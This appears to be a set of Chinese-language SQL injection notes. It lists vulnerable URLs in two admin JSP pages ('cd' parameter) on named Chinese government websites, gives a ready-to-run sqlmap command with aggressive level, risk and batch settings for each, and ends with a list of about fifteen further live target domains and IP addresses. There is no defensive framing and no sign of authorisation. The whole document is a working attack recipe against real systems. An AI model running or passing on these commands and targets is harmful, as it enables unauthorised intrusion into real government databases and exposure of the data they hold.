测试案例:
(1)http://www.hljts.gov.cn/index.jsp
注入点:
http://www.hljts.gov.cn/until/area_admin_sub.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000'

Sqlmap注入:
python sqlmap.py -u 'http://www.hljts.gov.cn/until/area_admin_sub.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000' -p cd --level 5 --risk 3 --dbms mssql --technique=E --batch -v 3 --current-db

(2)http://www.hntsw.gov.cn/
注入点:
http://www.hntsw.gov.cn/until/area_admin_sub.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000'
Sqlmap注入:
python sqlmap.py -u 'http://www.hntsw.gov.cn/until/area_admin_sub.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000' -p cd --level 5 --risk 3 --dbms mssql --technique=E --batch -v 3 --current-db

注入2
测试案例:
(1)http://www.hljts.gov.cn/index.jsp

注入点:
http://www.hljts.gov.cn/until/area_admin.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000'

Sqlmap注入:
python sqlmap.py -u 'http://www.hljts.gov.cn/until/area_admin.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000' -p cd --level 5 --risk 3 --dbms mssql --technique=E --batch -v 3 --current-db

(2)http://www.hntsw.gov.cn
注入点:
http://www.hntsw.gov.cn/until/area_admin.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000'
Sqlmap注入:
python sqlmap.py -u 'http://www.hntsw.gov.cn/until/area_admin.jsp?supform=from&supcd=DQDM&supnm=area&supaid=area&cd=120000' -p cd --level 5 --risk 3 --dbms mssql --technique=E --batch -v 3 --current-db

其他测试案例:
http://122.227.22.214:90/
http://111.75.211.4/
http://www.fjase.com/
http://218.7.71.241/
http://app.xjzj.gov.cn:8080/
http://59.56.172.51/
http://58.213.147.216/
http://202.100.241.70
http://www.hljts.gov.cn/
http://124.115.170.58
http://111.75.211.4
http://www.hntsw.gov.cn/
http://www.sxtsaj.com/
http://www.jxtzsb.cn/
http://220.171.93.132:8080